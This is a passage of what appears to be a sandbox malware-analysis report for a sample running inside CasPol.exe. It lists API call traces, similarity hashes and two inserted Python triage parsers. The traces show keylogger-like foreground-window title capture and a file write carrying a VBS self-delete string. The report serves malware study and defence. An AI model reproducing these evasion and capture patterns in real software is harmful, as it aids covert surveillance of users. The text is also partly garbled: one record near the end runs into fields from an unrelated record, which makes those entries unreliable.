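    """Parse one bullet; return None for lines that are not API calls."""
    m = API_LINE.match(line)
    if not m:
        return None
    sub, api, module, argtext, ref = m.groups()
    args: List[Optional[int]] = []
    if argtext:
        for tok in argtext.split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(api, module, args, int(ref, 16), int(sub, 16) if sub else None)


def parse_listing(text: str) -> List[ApiCall]:
    """Collect every API bullet from a chunk of report text; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call is not None:
            calls.append(call)
    return calls


def describe(call: ApiCall) -> str:
    """Decode the constants a triager cares about; empty string if nothing to add."""
    a = call.args
    if call.api == "Sleep" and a and a[0] is not None:
        return f"Sleep {a[0]} ms ({a[0] / 1000:g} s)"
    if call.api.startswith("RegOpenKeyEx") and len(a) >= 4:
        hive = HKEY_NAMES.get(a[0], "?" if a[0] is None else f"handle {a[0]:#x}")
        access = KEY_ACCESS.get(a[3], "?" if a[3] is None else f"{a[3]:#x}")
        return f"open registry key under {hive} with {access}"
    return ""


# Constructed input: the four API bullets of the function block above, copied verbatim.
SAMPLE = """\
• Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
"""

if __name__ == "__main__":
    for c in parse_listing(SAMPLE):
        note = describe(c)
        print(f"{c.ref:08X} {c.api}.{c.module} {c.args}" + (f"  <- {note}" if note else ""))
```

Run stand-alone it prints one line per call with the decoded note appended. The regex is deliberately tied to this report's formatting: lines that do not match (Memory Dump Source, Opcode ID and so on) are skipped rather than guessed at, and an argument the plugin could not recover stays None instead of being coerced to zero.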
APIs
• EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
• EnumDisplayDevicesW.USER32(?), ref: 00418652
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1432082543-0
                                                                                                                                                                                                                                  • Opcode ID: 1e20251fdec09666a9a8916a7f732ae6ea3fb948af866313831dbf64fa1c2fd0
                                                                                                                                                                                                                                  • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e20251fdec09666a9a8916a7f732ae6ea3fb948af866313831dbf64fa1c2fd0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 188215759-0
                                                                                                                                                                                                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                                                                                                  • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                                                                                                                                    • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                                                                                                                                    • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                                                  • String ID: [ $ ]
                                                                                                                                                                                                                                  • API String ID: 3309952895-93608704
                                                                                                                                                                                                                                  • Opcode ID: ebd93478415d7ceaf08988c946588b0e8d461d13856b31c8a019e387675c6f26
                                                                                                                                                                                                                                  • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebd93478415d7ceaf08988c946588b0e8d461d13856b31c8a019e387675c6f26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3604237281-0
                                                                                                                                                                                                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                  • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
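The per-function records above (an APIs list, the Memory Dump Source, the IDA snapshot and the Similarity hashes, closed by the Instruction Fuzzy Hash) are easier to triage in bulk than by scrolling. The following parser is an added example written for this edit; it is not code from the original report or from Joe Sandbox. Its sample input is the window-title and file-write records from this section, copied inline with the extraction indentation removed. The behaviour tags it emits ("window-title-capture", "file-append") and the Win32 constant decoding are the editor's own reading of the API names and arguments printed on the page, not sandbox signatures.

```python
"""
Parser for the per-function records in a Joe Sandbox "Function Analysis" dump.
Added example, not part of the original report or of Joe Sandbox.  The
behaviour tags at the bottom are the editor's own heuristics over the API
names visible in the dump, not sandbox signatures.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from the section above, indentation
# stripped.  Only the fields the parser uses are kept.
SAMPLE = """\
APIs
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
• Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000), ref: 0041B60C
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
• Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity")
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"•\s*(?P<key>[^:]+):\s?(?P<val>.*)$")
# dwCreationDisposition values of CreateFileW (Win32 constants).
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
GENERIC_WRITE, FILE_END = 0x40000000, 2

@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # raw stack values as printed ("?" = unresolved)
    ref: str            # call-site address
    subcall: str | None  # callee address when the call is "Part of subcall"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

def parse_records(text: str) -> list[FunctionRecord]:
    """One record per function; '• Instruction Fuzzy Hash:' closes it.
    A trailing record cut off mid-way (as at the end of a page) is dropped."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"],
                                    m["args"].split(","), m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            key = f["key"].strip()
            cur.fields[key] = f["val"].strip()
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records

def sleep_ms(rec: FunctionRecord) -> list[int]:
    """Sleep() arguments are printed as hex DWORDs (000001F4 -> 500 ms)."""
    return [int(a.args[0], 16) for a in rec.apis if a.name == "Sleep"]

def tag_behaviour(rec: FunctionRecord) -> list[str]:
    """Editor's heuristics (assumption), keyed on the API names in the record."""
    names = [a.name for a in rec.apis]
    tags = []
    # Foreground window title read in a loop with sleeps; the String ID "[ $ ]"
    # is Joe Sandbox's '$'-joined pair "[ " / " ]", i.e. the title is bracketed.
    if "GetForegroundWindow" in names and "GetWindowTextW" in names:
        tags.append("window-title-capture")
    if "CreateFileW" in names and "WriteFile" in names:
        cf = next(a for a in rec.apis if a.name == "CreateFileW")
        access, disp = int(cf.args[1], 16), int(cf.args[4], 16)
        sfp = next((a for a in rec.apis if a.name == "SetFilePointer"), None)
        # GENERIC_WRITE handle, pointer moved to FILE_END, then WriteFile.
        if access & GENERIC_WRITE and sfp and int(sfp.args[3], 16) == FILE_END:
            tags.append("file-append")
        tags.append("disposition=" + DISPOSITION.get(disp, hex(disp)))
    return tags

def summarise(text: str) -> list[dict]:
    return [{"api_id": r.fields.get("API ID", ""),
             "snapshot": r.fields.get("Snapshot File", ""),
             "apis": [a.name for a in r.apis],
             "sleep_ms": sleep_ms(r),
             "tags": tag_behaviour(r)} for r in parse_records(text)]

if __name__ == "__main__":
    for row in summarise(SAMPLE):
        print(row)
```

Run it on a full saved report to get one row per function with the API sequence, sleep intervals and tags; the trailing string argument of CreateFileW (fso.DeleteFile(Wscript.ScriptFullName)) survives the split because it contains no comma, so it can be grepped out of the `args` list as an indicator of the VBS self-delete stub.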
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
• Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
• Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
• Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
• Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
• Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
• Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                  • Instruction ID: 6a77029f59283c4afc38e459ca5b29238c6884d098e1e5420c53c581ecba7eff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B0144B2209B26FEE61186B86CC0C1B338CDF452F67BE0325F4305E1D1EA72CD804560
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                                                                                                                    • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                                                                                                                    • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                  • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,04571D66,00000000,00000000,?,04575C88,04571D66,00000000,00000000,00000000,?,04575E85,00000006,FlsSetValue), ref: 04575D13
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,04575C88,04571D66,00000000,00000000,00000000,?,04575E85,00000006,FlsSetValue,0457E190,FlsSetValue,00000000,00000364,?,04575BC8), ref: 04575D1F
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04575C88,04571D66,00000000,00000000,00000000,?,04575E85,00000006,FlsSetValue,0457E190,FlsSetValue,00000000), ref: 04575D2D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: fa83e55879c6cc92442df9cfcdd91b324a5ab1c11a2c29ea8c0e4615f67d9317
                                                                                                                                                                                                                                  • Instruction ID: 659f8a2fe1fda654ca585fb889a6e92161f5bb7e9f150138f352ec1acceaf9db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa83e55879c6cc92442df9cfcdd91b324a5ab1c11a2c29ea8c0e4615f67d9317
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901D83671222ABBC7214E69BC4CA563768FF457A17104A30F90AD7540F724E909E6D0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471B7,00414BBD,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004471B7,00414BBD,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00414BBD,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                  • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue), ref: 10016CB3
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000,00000364,?,10016B4E), ref: 10016CBF
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000), ref: 10016CCD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                  • Instruction ID: ff803806bf35457a8c9509914e7b957bc79ab392df546f2ce6f943c9b73d3fe4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A012B32215233BBD721CBA98C84E667B99EF197E17324630FE86DB140D731D892C6E0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                  • Opcode ID: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                  • Instruction ID: cadee44e4b68b609616d9b5a2801787b954e88145d2cb79ec865a40ecf5c13b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72519275E0021ADFDB14CFA8C881AADBBF5EF48350F25816AE854EB301E635EF418B51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
